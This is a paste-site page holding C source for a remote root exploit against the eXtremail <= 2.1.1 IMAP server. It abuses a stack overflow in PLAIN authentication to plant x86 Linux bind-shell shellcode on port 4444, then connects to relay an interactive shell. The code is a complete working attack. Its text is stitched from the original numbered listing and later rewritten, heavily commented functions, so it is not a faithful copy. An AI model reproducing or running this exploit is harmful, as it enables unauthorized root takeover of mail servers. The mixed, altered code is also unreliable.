Googleinurl

eXtremail <= 2.1.1 PLAIN authentication Remote Stack Overflow

Mar 11th, 2015
  1. /* extremail-v6.c
  2. *
  3. * Copyright (c) 2006 by <mu-b@digit-labs.org>
  4. *
  5. * eXtremail <=2.1.1 remote root exploit (x86-lnx)
  6. * by mu-b - Wed Oct 18 2006
  7. *
  8. * - Tested on: eXtremail 2.1.1 (lnx)
  9. * eXtremail 2.1.0 (lnx)
  10. *
  11. * Stack overflow in ifParseAuthPlain
  12. *
  13. * - Private Source Code -DO NOT DISTRIBUTE -
  14. * http://www.digit-labs.org/ -- Digit-Labs 2006!@$!
  15. */
  16.  
  17. #include <stdio.h>
  18. #include <stdlib.h>
  19.  
  20. #include <string.h>
  21. #include <unistd.h>
  22. #include <netinet/in.h>
  23. #include <netdb.h>
  24.  
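/* Raw request buffer size (bytes handed to the encoder at most). */
#define BUF_SIZE 2048
/* Encoded buffer size: base64 of BUF_SIZE bytes needs 4 output chars per
 * 3 input bytes, rounded UP, plus the trailing '\n' and '\0' that base64()
 * appends.  The old form BUF_SIZE/3*4+1 rounded down and left no room for
 * the terminator, so a full-size encode would overrun sbuf; it is also
 * fully parenthesised now so it can be used inside larger expressions. */
#define BBUF_SIZE (((BUF_SIZE + 2) / 3) * 4 + 2)

/* Filler byte used for the padding area of the request buffer. */
#define NOP 0x41

/* IMAP command line that starts the PLAIN exchange (tag "1"). */
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"

#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444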
  35.  
  36. static const char movshell_lnx[] =
  37. "\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
  38. "\x40" /* inc %eax */
  39. "\xff\xe0"; /* jmp *%eax */
  40.  
  41. static const char bndshell_lnx[] =
  42. "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
  43. "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
  44. "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
  45. "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
  46. "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
  47. "\x89\xe1\xcd\x80";
  48.  
  49. #define NUM_TARGETS 2
  50.  
  51. struct target_t
  52. {
  53. const char *name;
  54. const int len;
  55. const int zshell_pos;
  56. const char *zshell;
  57. const int fp_pos;
  58. const unsigned long fp;
  59. };
  60.  
  61. /* fp = objdump -D smtpd | grep "ff e0" */
  62. struct target_t targets[] = {
  63. {"Linux eXtremail 2.1.1 (tar.gz)",
  64. 256, 1, bndshell_lnx, 140, 0x08216357}
  65. ,
  66. {"Linux eXtremail 2.1.0 (tar.gz)",
  67. 256, 1, bndshell_lnx, 140, 0x08216377}
  68. ,
  69. {0}
  70. };
  71.  
  72. static const char base64tab[] =
  73. "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  74.  
  75. static int base64 (const char *ibuf, char *obuf, size_t n);
  76. static int sock_send (int sock, char *src, int len);
  77. static int sock_recv (int sock, char *dst, int len);
  78. static int sockami (char *host, int port);
  79. static void shellami (int sock);
  80. static void zbuffami (char *zbuf, struct target_t *trgt);
  81.  
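static int
base64 (const char *ibuf, char *obuf, size_t n)
{
  /* Base64-encode the first n bytes of ibuf into obuf as a single line.
   *
   * obuf receives the encoded text followed by '\n' and a '\0'
   * terminator, so it must hold at least ((n + 2) / 3) * 4 + 2 bytes.
   * There is no output-size argument, so the caller is responsible for
   * that (see BBUF_SIZE).  n == 0 yields "\n".
   *
   * Returns the length of the string written to obuf ('\n' included,
   * terminator not), i.e. what strlen (obuf) would report.  The length
   * is tracked while writing instead of being recomputed with strlen,
   * and the index type matches n so there is no signed/unsigned mix. */
  static const char tab[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
  size_t i, j = 0;

  for (i = 0; i < n; i += 3)
    {
      /* Pack up to three input bytes into 24 bits.  Missing trailing
       * bytes count as zero here and become '=' padding below. */
      unsigned int a = (unsigned char) ibuf[i];
      unsigned int b = i + 1 < n ? (unsigned char) ibuf[i + 1] : 0;
      unsigned int c = i + 2 < n ? (unsigned char) ibuf[i + 2] : 0;
      unsigned int v = (a << 16) | (b << 8) | c;

      obuf[j++] = tab[(v >> 18) & 63];
      obuf[j++] = tab[(v >> 12) & 63];
      obuf[j++] = i + 1 < n ? tab[(v >> 6) & 63] : '=';
      obuf[j++] = i + 2 < n ? tab[v & 63] : '=';
    }

  /* Line terminator: the caller sends obuf verbatim as one protocol line. */
  obuf[j++] = '\n';
  obuf[j] = '\0';

  /* No NUL can appear before obuf[j], so j equals strlen (obuf). */
  return (int) j;
}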
  115.  
static int
sock_send (int sock, char *src, int len)
{
  /* Thin wrapper around send (2) with no flags.  Returns exactly what
   * send returns: the number of bytes handed to the kernel, or -1 with
   * errno set.  A short send is passed through unchanged; the caller
   * decides whether to retry. */
  return (int) send (sock, src, (size_t) len, 0);
}
  125.  
static int
sock_recv (int sock, char *dst, int len)
{
  /* Receive up to len bytes into dst and NUL-terminate what arrived so
   * the caller can treat dst as a C string.  The terminator is stored at
   * dst[bytes_read], which can be dst[len], so dst must have room for
   * len + 1 bytes (callers pass sizeof buf - 1).
   *
   * Returns the recv (2) result: bytes read, 0 on orderly shutdown
   * (dst becomes ""), or -1 on error, in which case dst is not touched. */
  int got = (int) recv (sock, dst, (size_t) len, 0);

  if (got < 0)
    return got;

  dst[got] = '\0';
  return got;
}
  137.  
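static int
sockami (char *host, int port)
{
  /* Resolve host, create a TCP socket and connect it to host:port.
   * Returns the connected descriptor.  Every failure is fatal: a message
   * goes to stderr and the process exits, so callers never see -1 (that
   * contract is kept from the original; the descriptor is not closed on
   * the exit paths because the process ends anyway).
   *
   * Fixes: gethostbyname reports through h_errno, not errno, so the old
   * perror call printed an unrelated message; and the resolved address
   * is now checked to be an IPv4 address of sin_addr's size before it
   * is copied, instead of trusting h_length blindly. */
  struct sockaddr_in address;
  struct hostent *hp;
  int sock;

  fflush (stdout);	/* progress text was printed without a newline */

  sock = socket (AF_INET, SOCK_STREAM, 0);
  if (sock == -1)
    {
      perror ("socket()");
      exit (-1);
    }

  hp = gethostbyname (host);
  if (hp == NULL)
    {
      fprintf (stderr, "gethostbyname(): cannot resolve %s\n", host);
      exit (-1);
    }

  if (hp->h_addrtype != AF_INET
      || hp->h_length != (int) sizeof (address.sin_addr))
    {
      fprintf (stderr, "gethostbyname(): %s has no IPv4 address\n", host);
      exit (-1);
    }

  memset (&address, 0, sizeof (address));
  /* h_addr_list[0] is the portable spelling of the h_addr macro. */
  memcpy (&address.sin_addr, hp->h_addr_list[0], sizeof (address.sin_addr));
  address.sin_family = AF_INET;
  address.sin_port = htons ((uint16_t) port);

  if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
    {
      perror ("connect()");
      exit (EXIT_FAILURE);
    }

  return sock;
}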
  171.  
static void
shellami (int sock)
{
  /* Interactive relay on an already connected socket: send one initial
   * command line, then copy whatever the socket produces to stdout and
   * whatever is typed on stdin to the socket.  Does not return; the
   * process exits when the peer closes the connection. */
  int n;
  fd_set rset;
  char recvbuf[1024], *cmd = "id; uname -a; uptime\n";

  /* Return value of sock_send is not checked anywhere in this function. */
  sock_send (sock, cmd, strlen (cmd));

  while (1)
    {
      FD_ZERO (&rset);
      FD_SET (sock, &rset);
      FD_SET (STDIN_FILENO, &rset);
      /* NOTE(review): select's result is ignored; on -1 (e.g. EINTR) the
       * FD_ISSET tests below run against an unspecified set. */
      select (sock + 1, &rset, NULL, NULL, NULL);
      if (FD_ISSET (sock, &rset))
        {
          /* sizeof - 1 leaves room for the NUL that sock_recv appends. */
          if ((n = sock_recv (sock, recvbuf, sizeof (recvbuf) - 1)) <= 0)
            {
              fprintf (stderr, "Connection closed by foreign host.\n");
              exit (EXIT_SUCCESS);
            }
          /* Printed as a string: output stops at the first NUL byte
           * received, so anything after it in this chunk is dropped. */
          printf ("%s", recvbuf);
        }
      if (FD_ISSET (STDIN_FILENO, &rset))
        {
          if ((n = read (STDIN_FILENO, recvbuf, sizeof (recvbuf) - 1)) > 0)
            {
              recvbuf[n] = '\0';
              sock_send (sock, recvbuf, n);
            }
          /* NOTE(review): EOF on stdin (n == 0) is not handled; stdin stays
           * readable, so the loop spins on select until the peer closes. */
        }
    }
}
  206.  
  207. static void
  208. zbuffami (char *zbuf, struct target_t *trgt)
  209. {
  210. int i;
  211. char *fill = "digitlabs";
  212.  
  213. memset (zbuf, NOP, trgt->len);
  214. memcpy (zbuf + trgt->zshell_pos, trgt->zshell, strlen (trgt->zshell));
  215.  
  216. zbuf[trgt->fp_pos + 1] = (u_char) (trgt->fp & 0x000000ff);
  217. zbuf[trgt->fp_pos + 1 + 1] = (u_char) ((trgt->fp & 0x0000ff00) >> 8);
  218. zbuf[trgt->fp_pos + 1 + 2] = (u_char) ((trgt->fp & 0x00ff0000) >> 16);
  219. zbuf[trgt->fp_pos + 1 + 3] = (u_char) ((trgt->fp & 0xff000000) >> 24);
  220.  
  221. memcpy (zbuf + trgt->fp_pos + 1 + sizeof (u_long), movshell_lnx,
  222. strlen (movshell_lnx));
  223.  
  224. /* rfc #2595 states "\x00<username>\x00<password>" */
  225. zbuf[0] = '\0';
  226. zbuf[trgt->fp_pos + 1 + sizeof (u_long) + strlen (movshell_lnx)] = '\0';
  227.  
  228. for (i = trgt->fp_pos + 1 + sizeof (u_long) + strlen (movshell_lnx) + 1;
  229. i < trgt->len; i++)
  230. zbuf[i] = fill[i % strlen (fill)];
  231. }
  232.  
int
main (int argc, char **argv)
{
  /* Command line: argv[1] is the host, argv[2] the index into targets[].
   * Every exit path, including usage errors and a lost connection, uses
   * EXIT_SUCCESS, so a caller cannot distinguish failure from success
   * by exit status. */
  int sock, rbytes;
  char zbuf[BUF_SIZE], sbuf[BBUF_SIZE];
  struct target_t *trgt;

  printf ("eXtremail <=2.1.1 remote root exploit\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");

  if (argc <= 2)
    {
      fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  /* NOTE(review): atoi yields 0 for non-numeric input and a negative
   * value passes this test, so "-1" indexes before the start of
   * targets[].  strtol with an explicit range check would be the safe
   * form; atoi is also evaluated twice below. */
  if (atoi (argv[2]) >= NUM_TARGETS)
    {
      fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS);
      exit (EXIT_SUCCESS);
    }

  trgt = &targets[atoi (argv[2])];
  printf ("+Connecting to %s...", argv[1]);
  sock = sockami (argv[1], PORT_IMAPD);
  /* Read and discard the server greeting.  sizeof - 1 leaves room for
   * the NUL that sock_recv appends; rbytes == 0 (peer closed) is not
   * treated as an error here. */
  rbytes = sock_recv (sock, zbuf, sizeof (zbuf) - 1);
  if (rbytes < 0)
    exit (EXIT_SUCCESS);
  printf (" connected\n");

  /* fp is unsigned long; the cast to int narrows it for %x. */
  printf ("fp: 0x%x\n", (int) trgt->fp);
  printf ("buf len: %d\n", trgt->len);

  printf ("+Building buffer with shellcode...");
  /* zbuffami writes trgt->len bytes; nothing checks that against
   * sizeof (zbuf) here. */
  memset (zbuf, 0x00, sizeof (zbuf));
  zbuffami (zbuf, trgt);
  printf (" done\n");

  printf ("+Building base64 encoded buffer...");
  /* Only the first trgt->len bytes are encoded; the result is a single
   * '\n'-terminated line in sbuf. */
  base64 (zbuf, sbuf, trgt->len);
  printf (" done\n");

#ifdef DEBUG
  sleep (15);
#endif

  printf ("+Making request...");
  /* sock_send results are never checked on this path. */
  sock_send (sock, AUTH_CMD, strlen (AUTH_CMD));
  /* Continuation response is read into zbuf, overwriting the buffer
   * built above (already encoded into sbuf, so nothing is lost). */
  rbytes = sock_recv (sock, zbuf, sizeof (zbuf) - 1);
  if (rbytes < 0)
    exit (EXIT_SUCCESS);

  sock_send (sock, sbuf, strlen (sbuf));
  printf (" done\n");

  printf ("+Waiting for the shellcode to be executed...\n");
  sleep (1);
  /* The first descriptor is overwritten without being closed. */
  sock = sockami (argv[1], PORT_SHELL);
  printf ("+Wh00t!\n\n");
  shellami (sock);

  return (EXIT_SUCCESS);
}
